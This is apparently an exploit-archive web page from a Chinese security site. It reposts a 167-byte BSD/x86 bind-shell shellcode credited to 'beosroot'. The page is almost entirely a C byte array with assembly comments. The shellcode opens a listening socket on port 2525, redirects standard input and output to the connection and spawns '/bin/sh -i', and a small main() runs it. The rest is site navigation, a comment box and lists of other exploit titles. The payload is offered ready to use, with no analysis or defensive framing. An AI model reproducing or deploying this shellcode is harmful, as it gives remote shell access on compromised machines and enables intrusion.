首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 bds/x86-bindshell on port 2525 shellcode 167 bytes 来源：beosroot@hotmail.fr 作者：beosroot 发布时间：2010-04-23   ================================================== bds/x86-bindshell on port 2525 shellcode 167 bytes ================================================== /* -------------- bds/x86-bindshell on port 2525 167 bytes ------------------------- *  AUTHOR : beosroot *   OS    : BSDx86 (Tested on FreeBSD) *   EMAIL : beosroot@hotmail.fr              beosroot@null.net *  GR33TZ To : joseph-h, str0ke, MHIDO55,..... */ const char shellcode[] =     "\x6a\x00"                  // push   $0x0     "\x6a\x01"                  // push   $0x1     "\x6a\x02"                  // push   $0x2     "\x50"                      // push   %eax     "\x6a\x61"                  // push   $0x61     "\x58"                      // pop    %eax     "\xcd\x80"                  // int    $0x80     "\x50"                      // push   %eax     "\x6a\x00"                  // push   $0x0     "\x6a\x00"                  // push   $0x0     "\x6a\x00"                  // push   $0x0     "\x6a\x00"                  // push   $0x0     "\x68\x10\x02\x09\xdd"      // push   $0xdd090210     "\x89\xe0"                  // mov    %esp,%eax     "\x6a\x10"                  // push   $0x10     "\x50"                      // push   %eax     "\xff\x74\x24\x1c"          // pushl  0x1c %esp     "\x50"                      // push   %eax     "\x6a\x68"                  // push   $0x68     "\x58"                      // pop    $eax     "\xcd\x80"                  // int    $0x80     "\x6a\x01"                  // push   $0x1     "\xff\x74\x24\x28"          // pushl  0x28 %esp     "\x50"                      // push   %eax     "\x6a\x6a"                  // push   $0x6a     "\x58"                      // pop    $eax     "\xcd\x80"                  // int    $0x80     "\x83\xec\x10"              // sub    $0x10,$esp     "\x6a\x10"                  // push   $0x10     "\x8d\x44\x24\x04"          // lea    0x4%esp,%eax     "\x89\xe1"                  // mov    %esp,%ecx     "\x51"                      // push   %ecx     "\x50"                      // push   %eax     "\xff\x74\x24\x4c"          // pushl  0x4c %esp     "\x50"                      // push   %eax     "\x6a\x1e"                  // push   %0x1e     "\x58"                      // pop    %eax     "\xcd\x80"                  // int    $0x80     "\x50"                      // push   %eax     "\xff\x74\x24\x58"          // pushl  0x58 %esp     "\x50"                      // push   %eax     "\x6a\x06"                  // push   $0x6     "\x58"                      // pop    %eax     "\xcd\x80"                  // int    $0x80     "\x6a\x00"                  // push   $0x0     "\xff\x74\x24\x0c"          // pushl  0xc %esp     "\x50"                      // push   %eax     "\x6a\x5a"                  // push   $0x5a     "\x58"                      // pop    %eax     "\xcd\x80"                  // int    $0x80     "\x6a\x01"                  // push   $0x1     "\xff\x74\x24\x18"          // pushl  0x18 %esp     "\x50"                      // push   %eax     "\x6a\x5a"                  // push   $0x5a     "\x58"                      // pop    %eax     "\xcd\x80"                  // int    $0x80     "\x6a\x02"                  // push   $0x2     "\xff\x74\x24\x24"          // pushl  0x24 %esp     "\x50"                      // push   %eax     "\x6a\x5a"                  // push   $0x5a     "\x58"                      // pop    %eax     "\xcd\x80"                  // int    $0x80     "\x68\x73\x68\x00\x00"      // push   $0x6873     "\x89\xe0"                  // mov    %esp,%eax     "\x68\x2d\x69\x00\x00"      // push   $0x692d     "\x89\xe1"                  // mov    %esp,%ecx     "\x6a\x00"                  // push   $0x0     "\x51"                      // push   %ecx     "\x50"                      // push   %eax     "\x68\x2f\x73\x68\x00"      // push   $0x68732f     "\x68\x2f\x62\x69\x6e"      // push   $0x6e69622f     "\x89\xe0"                  // mov    %esp,%eax     "\x8d\x4c\x24\x08"          // lea    0x8 %esp,%ecx     "\x6a\x00"                  // push   $0x0     "\x51"                      // push   %ecx     "\x50"                      // push   %eax     "\x50"                      // push   %eax     "\x6a\x3b"                  // push   $0x3b     "\x58"                      // pop    %eax     "\xcd\x80";                 // int    $0x80 int main() {     void (*hell)() = (void *)shellcode;     return (*(int(*)())shellcode)(); } // the end o.O ]   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·ZipGenius zgtips.dll Stack Buf ·linux/x86 setreuid(0, 0) & exe ·Multiple Browsers Audio Tag Do ·bsd/x86 reboot() shellcode 15 ·Mozilla Firefox/Thunderbird/Se ·Apache OFBiz Multiple XSS Vuln ·Speed Commander 13.10 (.zip) M ·Invision Power Board 0-day den ·Linux write() & exit(0) shellc ·Invision power board 0-day den ·Acritum Femitter v1.03 Directo ·Xftp client 3.0 PWD Remote Exp   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved